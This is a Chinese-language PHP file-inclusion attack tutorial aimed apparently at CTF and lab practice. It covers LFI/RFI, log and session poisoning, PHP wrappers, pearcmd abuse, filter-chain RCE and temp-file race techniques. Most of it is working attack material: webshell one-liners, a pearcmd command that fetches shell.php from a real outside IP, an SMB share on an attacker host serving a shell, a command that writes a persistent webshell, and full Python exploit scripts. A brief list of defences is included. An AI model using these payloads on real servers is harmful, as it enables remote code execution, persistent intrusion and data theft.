原文同步自语雀：文件包含

Demo payloads are spacing-neutralized to avoid local antivirus false positives; only test in authorized labs.

文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，并让服务端执行。

我们常常把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程叫做包含。

以PHP为例,常用的文件包含函数有以下四种

include(),require(),include_once(),require_once()

require():找不到被包含的文件会产生致命错误，并停止脚本运行
include():找不到被包含的文件只会产生警告，脚本继续执行，文件后缀不影响。
require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含，则不会再次包含
include_once()与include()类似:唯一的区别是如果该文件的代码已经被包含，则不会再次包含

本地文件包含

能够打开并包含本地文件的漏洞，我们称为本地文件包含漏洞(LFI)

测试网页包含如下代码:

< ?php
	$file=$ _GET['filename'];
	include($file);
?>

（1）使用绝对路径

使用绝对路径直接读取:

（2）使用相对路径进行读取

通过./表示当前位置路径，…/表示上一级路径位置，在linux中同样适用。

例如当前页面所在路径为C:\Apache24\htdocs\，我们需要使用…/退到C盘再进行访问，构造路径如下：

../../windows/system.ini

由于我的环境搭建在D盘，所以这里就不做演示了。

（3）一些常见的敏感目录信息路径:

Windows系统:

C:\boot.ini //查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
C:\windows\repair\sam //存储Windows系统初次安装的密码
C:\ProgramFiles\mysql\my.ini //Mysql配置
C:\ProgramFiles\mysql\data\mysql\user.MYD //MySQL root密码
C:\windows\php.ini //php配置信息

Linux/Unix系统：

/etc/password //账户信息
/etc/shsadow //账户密码信息
/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置
/usr/local/app/php5/lib/php.ini //PHP相关配置
/etc/httpd/conf/httpd.conf //Apache配置文件
/etc/my.conf //mysql配置文件

LFI漏洞利用技巧

配合文件上传使用

有时候我们找不到文件上传漏洞，无法上传web shell，可以先上传一个图片格式的web shell到服务器，再利用本地文件包含漏洞进行解析。

以DVWA平台为例，将Security Level选择low，编辑一个图片马，内容如下:

1
2
3

< ?php
	fwrite(fopen("shell.php","w"),'< ?php ev al($ _POST[123]);?>);
?>

找到上传点进行上传：

文件保存的完整路径为：

DVWA平台low等级文件包含漏洞页面如下：

该页面用于读取C:\phpStudy\WWW\vulnerabilities\fi\路径中的文件，代码如下：

现在我们利用该页面去执行我们上传的图片马

构造URL如下，代码成功解析，我这里使用的phpinfo进
行测试，实战直接替换为上述所写的一句话木马即可。

注：我们也可以直接在web shell.jpg中写一句话木马，然后再通过文件包含漏洞去连接web shell.jpg，但这种方法有时候web shell功能会出现异常。所以我们选择上面的方式，生成一个.php格式的一句话木马，再去连接。

日志上传

寻找日志位置

Apache

Apache + Linux日志默认路径
/etc/httpd/logs/access_log    
或      
/var/log/httpd/access_log

Apache+Windows日志默认路径
XAMPP套件:xampp\apache\logs\access.log
phpStudy套件:phpStudy\Apache\logs\access.log

IIS

IIS6 默认日志文件位置
C:WINDOWS\system32\Logfiles

IIS7 默认日志文件位置
%SystemDrive%\inetpub\logs\LogFiles

Nginx

nginx日志文件在用户安装目录的logs目录下
如安装目录为/usr/local/nginx
则日志目录就是在/usr/local/nginx/logs里
也可通过其配置文件nginx.conf
获取到日志的存在路径(/opt/nginx/logs/access.log)

     /var/log/nginx/access.log

    /var/log/apache/access.log

    <font style="color:rgb(77, 77, 77);">/var/log/apache2/access.log</font>

    /var/log/nginx/error.log

user-Augent/Cookie输入php代码
```
 <? sys tem('ls /');?>
```

我们可以在此处写入一句话木马，再使用web shell管理工具进行连接。

包含session文件

可以先根据尝试包含到SESSION文件，在根据文件内容寻找可控变量，在构造payload插入到文件中，最后包含即可。

利用条件:

找到Session内的可控变量
Session文件可读写，并且知道存储路径

php的session文件的保存路径可以在phpinfo的session.save_path看到。

常见路径:

/var/lib/php/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
session文件格式:sess_[phpsessid],而phpsessid在发送的请求的cookie字段中可以看到。

案例：

https://chybeta.github.io/2017/11/09/%E4%B8%80%E9%81%93CTF%E9%A2%98%EF%BC%9APHP%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/

包含临时文件

php中上传文件，会创建临时文件。在linux下使用/tmp目录，而在windows下使用C:\windows\temp目录。在临时文件被删除前，可以利用时间竞争的方式包含该临时文件。

由于包含需要知道包含的文件名。一种方法是进行暴力猜解，linux下使用的是随机函数有缺陷，而windows下只有65535种不同的文件名，所以这个方法是可行的。

另一种方法是配合phpinfo页面的php variables，可以直接获取到上传文件的存储路径和临时文件名，直接包含即可。

例题：

https://chybeta.github.io/2017/08/22/XMAN%E5%A4%8F%E4%BB%A4%E8%90%A5-2017-babyweb-writeup/

远程文件包含

如果PHP的配置选项allow_url_include、allow_url_fopen状态为ON的话，则include/require函数是可以加载远程文件的，这种漏洞被称为远程文件包含(RFI)

首先我们来看一段代码

< ?php
	$path=$ _GET['path'];
	include($path . '/phpinfo.php');
  //在后面加上phpinfo.php，要截断
?>

访问本地site目录下的phpinfo.php文件:

该页面并没有对$path做任何过滤，因此存在文件包含漏洞。

我们在远端Web服务器/site/目录下创建一个test.php文件，内容为phpinfo()，利用漏洞去读取这个文件。

但是代码会给我们输入的路径后面加上’/phpinfo.php’后缀，如果php版本小于5.3.4，我们可以尝试使用%00截断，这里php版本为7.3.4，不适用。

还有一种截断方法就是?号截断，在路径后面输入?号，服务器会认为?号后面的内容为GET方法传递的参数，成功读取test.php如下：

如果test.php是恶意的web shell文件，那么利用该漏洞就可以获取到服务器权限。

利用SMB共享

即便PHP环境将 allow_url_include 等选项关闭，PHP底层仍然支持通过SMB协议访问文件。攻击者只需在自己的服务器上配置一个允许匿名访问的SMB共享，并在其中存放恶意代码，然后将目标应用程序的文件包含路径指向这个SMB地址：

攻击者搭建匿名 SMB 共享（Linux 上用 Impacket）：

1	sudo impacket-smbserver share /tmp/payload -smb2support

在 /tmp/payload/shell.php 放入 web shell，然后：

1	?page=\\attacker_IP\share\shell.php

php伪协议

PHP内置了很多URL风格的封装协议，可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数

如下所示：

file://协议

用于访问本地文件系统，在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

file:// [文件的绝对路径和文件名]
eg：
   file:///var/www/html/flag
   开头/被禁改为
   file://localhost/var/www/html/flag

php://伪协议

php:// 访问各个输入/输出流（I/O streams），在CTF中经常使用的是php://filter和php://input

php://filter用于读取源码。

php://filter/convert.base64-encode/resource=文件路径
php://filter/convert.base64-encode/resource=flag.php
php://filter/read=string.rot13/resource=flag.php //一般不用
php://filter/read=string.toupper/resource=flag.php  
//字符串大小写转换 string.toupper  [ 即 strtoupper() ]   转大写字母
                string.tolower  [ 即strtolower() ]   转小写字母
php://filter/convert.iconv_utf-8.utf-16be/resource=flag.php

php://input用于执行php代码。

访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。

需要注意的是,当enctype=multipart/form-data时,php:/input将会无效
利用条件:

allow_url_fopen ：off/on
allow_url_include：on

1 2	?url=php://input — GET请求参数中使用php://input协议 < ?php sys tem(‘ls’); ?> — post请求体中的内容会被当做文件内容执行

zip://伪协议

zip:// 可以访问压缩包里面的文件。当它与包含函数结合时，zip://流会被当作php文件执行。从而实现任意代码执行。

zip://中只能传入绝对路径。
要用#分割压缩包和压缩包里的内容，并且#要用url编码成%23(即下述POC中#要用%23替换）
只需要是zip的压缩包即可，后缀名可以任意更改。
相同的类型还有zlib://和bzip2://

1
2
3

zip://[压缩包绝对路径]#[压缩包内文件]
eg：
?file=zip://D:\1.zip%23phpinfo.txt

data://伪协议

data:// 同样类似与php://input，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。从而导致任意代码执行。

利用data:// 伪协议可以直接达到执行php代码的效果，例如执行phpinfo()函数：

利用条件:

allow_url_fopen ：on
allow_url_include：on

1
2
3

data://text/plain,< ?php phpinfo();?>
//如果此处对特殊字符进行了过滤，我们还可以通过base64编码后再输入：
data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

phar://协议—反序列化攻击

phar 是 PHP 的归档格式，包含一段序列化的 metadata。当 PHP 通过 phar 协议访问该文件时，metadata 会被自动反序列化，从而触发应用中已存在的反序列化利用链（POP chain）。

1
2
3

1. 构造一个包含恶意序列化数据的 phar 文件，扩展名改为 .jpg
2. 通过任意上传点上传 evil.jpg
3. 包含触发：?file=phar://uploads/evil.jpg/test

小结

防护

1、使用str_replace等方法过滤掉危险字符

2、配置open_basedir，防止目录遍历（open_basedir 将php所能打开的文件限制在指定的目录树中）

3、php版本升级，防止%00截断

4、对上传的文件进行重命名，防止被读取

5、对于动态包含的文件可以设置一个白名单，不读取非白名单的文件。

6、做好管理员权限划分，做好文件的权限管理，allow_url_include和allow_url_fopen最小权限化

高阶用法

伪协议

php的iconv都能用哪些编码，可以从PHP官网查看，挑个编码用一下。

1 2	php://filter/convert.iconv.ASCII.UCS-2BE/resource=index.php php://filter/convert.iconv.utf-8.utf-7/resource=index.php

可以利用include函数解urlencode的特性来编码绕过：

1	?page=php://filter/convert.%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=index.php

opcache缓存

:::tips
一般题目的形式是给到phpinfo，给文件包含或者任意文件读取，flag在flag.php

:::

< ?php
error_reporting(0);

//I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker.
if ( isset($ _GET['file']) ) {
    $file = $ _GET['file'];
    
    if ( $file === "phpinfo" ) {
        phpinfo(); // 有phpinfo
        exit;
    }

    if ( preg_match('/proc/i' , $file) ) {
        die("private");
    }

    $file = "/var/www/html/" . $file;
    $content = file_get_contents ($file);

    if ( !$content ) {
        die("nothing");
    }

// 输出时不能包含php标签，但是opcache缓存的bin文件不包含php标签，所以可以包含之
    if ( preg_match("/script|<?/i", $content) ) { 
        die("bypass me");
    }

    include_once $file; // 有文件包含 可以读文件用

} else {
    highlight_file(__FILE__);
}

寻找路径

在phpinfo.php中寻找

OPcache通过将PHP脚本预编译的字节码存储到共享内存中来提升PHP的性能，存储预编译字节码的好处就是省去了每次加载和解析PHP脚本的开销

他本来是个提升性能的扩展，然而他的配置有一个比较有趣的东西就是 opcache.file_cache

在/var/www/cache/下存在着 PHP 的缓存文件，那么自然也会有 flag.php 的缓存，会在缓存文件夹内以/var/www/html/flag.php.bin存在，而完整的绝对路径是

1 2	/var/www/cache/[一个 md5]/ var/www/html/flag.php.bin md5：由php版本号、zend extension id、Zend Bin ID拼接起来md5

pearcmd装马

pearcmd了解https://blog.csdn.net/RABCDXB/article/details/122050370

在phpinfo中如果看到register_argc_argv开放，可以获取外部的参数，以+作为分隔符

pearcmd.php是pear命令调用的文件，是用来管理依赖的，类似python的pip。能包含它又能给参数的话，就可以用它来安装木马了：

靶机可出网

在自己的云主机上准备一个shell（一句话），直接在后台编辑即可

利用方式：

1 2	/?include=/usr/local/lib/php/pearcmd.php&+install+http://47.109.88.102/shell.php /?include=/usr/local/lib/php/pearcmd.php&+download+http://47.109.88.102/shell.php

用install会下载到/tmp目录下，用download会下载到当前目录（但是大部分情况当前目录都没有可写权限，所以推荐用install），下载后会有访问路径

靶机不可出网

写shell：

1	/?include=/usr/local/lib/php/pearcmd.php&+config-create+/<?=ev al($ _POST[1])?>+/tmp/shell.php

之后直接访问读flag

绕过包含次数限制

已经包含了flag.php一次了，那么就没办法继续包含它了。解题方法如下：

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

路径中的/proc/self/root就表示/ 所以/proc/self/root/proc/self/root···就一直表示/路径。

/proc/self/root 的个数无限制。原因看https://www.anquanke.com/post/id/213235，目前看不懂。

include2shell

步骤

假设漏洞代码 include.php 是：

1	< ?php include($ _GET['page']); ?>

第一步：生成 chain

1	python3 php_filter_chain_generator.py --chain '< ?php sys tem($ _GET[0]);?> '

第二步：URL 编码后拼到漏洞参数里

1	http://target/include.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR\|...\|/resource=/etc/passwd&0=id

第三步：通过 0= 参数传命令

&0=id
&0=whoami
&0=ls /
&0=cat+/flag

php_filter_chain_generator.py

工具有两个参数：

--chain：你想最终被 include 执行的 PHP 代码内容。

--rawbase64：调试用，直接给 Base64 字符串看链条怎么生成。

注意

简化 web shell 减小体积：用短标签写得越短越好，常见的几种：

1
2
3

< ?=`$ _GET[0]`;?>          # 反引号执行命令
< ?=sys tem($ _GET[0]);?>    # system 函数
< ?php ev al($ _POST[0]);?>  # eval + POST，配合蚁剑

代码越短，生成的 chain 越短。

末尾可能要补空格：README 里也提到了，--chain 后面有时候要 pad 空格才能让 Base64 对齐到 4 的倍数（Base64 必须 4 字节一组），不然解码会丢字符。比如：

1	python3 php_filter_chain_generator.py --chain '< ?php sys tem($ _GET[0]);?> '

末尾加一个或两个空格试试。

配合蚁剑/冰蝎

如果只是 CTF 拿 flag，< ?=sys tem($ _GET[0]);?> 就够了。如果要持久化连接（授权测试场景），可以生成 < ?php ev al($ _POST['x']);?> 的 chain，然后蚁剑直接连那个 LFI URL，把 eval 那段当 web shell 用。

不过 filter chain 每次请求都要传一遍超长 payload，体验比较差。实战里更常见的做法是：先用 filter chain 拿到一次 RCE，然后立刻往一个可写目录里 echo 一个真正的 web shell 文件，之后再连那个文件就行了。

1	&0=echo '< ?php ev al($ _POST[x]);?>' > /var/www/html/uploads/x.php

Oracle 版本

php_filter_chains_oracle_exploit 这个工具更狠：它用 PHP 报错信息作为 oracle，能在目标根本不返回内容的情况下，逐字节读出文件内容。适用场景是 file_get_contents、hash_file、file()、copy() 这种本来不会回显的函数。CTF 里碰到”诶这函数能读文件但看不到结果”的题，就是它出场。

用法类似：

1	python3 filters_chain_oracle_exploit.py --target url --file 文件名 --parameter 参数

compress.zlib生成临时文件

https://cloud.tencent.com/developer/tools/blog-entry?target=https%3A%2F%2Fblog.zeddyu.info%2F2020%2F01%2F08%2F36c3-web%2F%23includer&objectId=2145160&objectType=1&contentType=undefined

步骤

from pwn import *
import requests
import re
import threading
import time

# 构造分块传输的HTTP块：十六进制长度 + 数据
def send_chunk(l, data):
    l.send('''{}{}
'''.format(hex(len(data))[2:], data))

while(True):
    # 监听9999端口
    l = listen(9999)
    l.wait_for_connection()

    # 构造三部分数据：填充 + PHP恶意代码 + 注释闭合
    data1 = ''.ljust(1024 * 8, 'X')  # 1024*8字节的'X'填充
    data2 = '< ?php sys tem("/readflag"); exit(); /*'.ljust(1024 * 8, 'b')  # PHP代码（执行/readflag）
    data3 = 'c*/'.rjust(1024 * 8, 'c')  # 注释闭合（/*...*/结构）

    # 等待连接并发送HTTP头（声明分块传输）
    l.recvuntil('\r\n\r\n')
    l.send('''HTTP/1.1 200 OK
Content-Type: exploit/revxakep
Connection: close
Transfer-Encoding: chunked

''')

    send_chunk(l, data1)  # 发送填充数据
    print('waiting...')
    print('sending php code...')

    send_chunk(l, data2)  # 发送PHP恶意代码
    sleep(3)  # 延迟3秒
    send_chunk(l, data3)  # 发送注释闭合
    l.send('''0
\r
\r
''')  # 分块传输结束标记
    l.close()  # 关闭连接

data2数据

1 2	data2 = '< ?php echo "INCLUDE_SUCCESS_123"; exit(); /'.ljust(1024 8, 'b') 改成一句话木马

:::tips
在你本机开一个 9999 端口的 HTTP 服务，等目标 PHP 来访问，然后用 Transfer-Encoding: chunked 分块慢慢返回一大段内容，其中夹着 PHP 代码，目的是配合 compress.zlib://http://你的IP:9999 生成可控临时文件

:::

触发目标生成临时文件

向目标传入类似结构：

1	file=compress.zlib://http://你的IP:端口

目标 PHP 会尝试访问你的 HTTP server。

如果成功，目标本地可能会出现临时文件。

本地靶场可以用文件监控工具观察：

1 2	/tmp/phpxxxxxx files/随机目录/phpxxxxxx

寻找临时文件路径

这是难点之一。

路径可能来自：

报错信息
题目回显
sandbox 目录提示
本地 fswatch/inotify 监控
源码逻辑
临时目录规律

CTF 里通常会给一些提示，比如：

1	your sandbox: files/xxxxxx

然后临时文件可能在：

1	files/xxxxxx/php随机名

在临时文件存在时包含它

不断尝试让文件包含点包含临时文件路径。

逻辑上是：

1	include 临时文件

如果临时文件还没删除，并且内容满足 PHP 解析条件，就可能包含成功。

包含nginx临时文件

https://cloud.tencent.com/developer/tools/blog-entry?target=https%3A%2F%2Ftttang.com%2Farchive%2F1384%2F&objectId=2145160&objectType=1&contentType=undefined

依然是临时文件包含的延伸利用姿势。大概利用到如下几条原理：

当nginx接收fastcgi响应过大则会将一部分内容以临时文件的形式存在硬盘上
临时文件会被很快清除，但是/proc/xxx/fd/x依然可以取到这个临时文件的内容，pid和fd需要遍历
利用上面wmctf例题绕过包含次数限制的方法去包含/proc/xxx/fd/x即可

常见目录

1
2
3

/var/lib/nginx/body/
/var/cache/nginx/client_temp/
/tmp/nginx/client_body/

配置项通常和这个有关：

1 2	client_body_temp_path client_body_buffer_size

用 Python 发送大请求体

import requests
import os

# --- 配置部分 ---
TARGET_URL = "http://127.0.0.1/test.php"
TEMP_FILE = "body.bin"

# --- 第一阶段：生成 Payload 文件 ---
def generate_payload(filename):
    print(f"[*] 正在生成 Payload 文件: {filename}...")
    # 这里使用简单的 echo 示例，实际可替换为你之前复杂的 PHP 代码
    payload = b'< ?php echo "---HACKED BY Y1NG---"; echo file_get_contents ("/flag"); exit(); /*'
    
    with open(filename, "wb") as f:
        f.write(b"A" * 10 * 1024 * 1024)  # 10MB 前缀
        f.write(payload)                  # 恶意代码
        f.write(b"B" * 10 * 1024 * 1024)  # 10MB 中缀
        f.write(b"*/")                    # 闭合注释
        f.write(b"C" * 30 * 1024 * 1024)  # 30MB 尾部填充（增加处理时间）
    print(f"[+] 文件生成完毕，大小: {os.path.getsize(filename) / (1024*1024):.2f} MB")

# --- 第二阶段：发送攻击请求 ---
def send_payload(url, filename):
    print(f"[*] 正在向 {url} 发送大数据包...")
    try:
        with open(filename, "rb") as f:
            # 这里的 data=f 会以流的形式发送整个 bin 文件内容
            # 注意：这不是 multipart/form-data，而是 Raw POST Data
            response = requests.post(url, data=f, timeout=10)
        
        print(f"[+] 服务器返回状态码: {response.status_code}")
        print("[+] 响应内容前200字符:")
        print("-" * 30)
        print(response.text[:200])
        print("-" * 30)
    except Exception as e:
        print(f"[!] 发送失败: {e}")

# --- 执行 ---
if __name__ == "__main__":
    generate_payload(TEMP_FILE)
    send_payload(TARGET_URL, TEMP_FILE)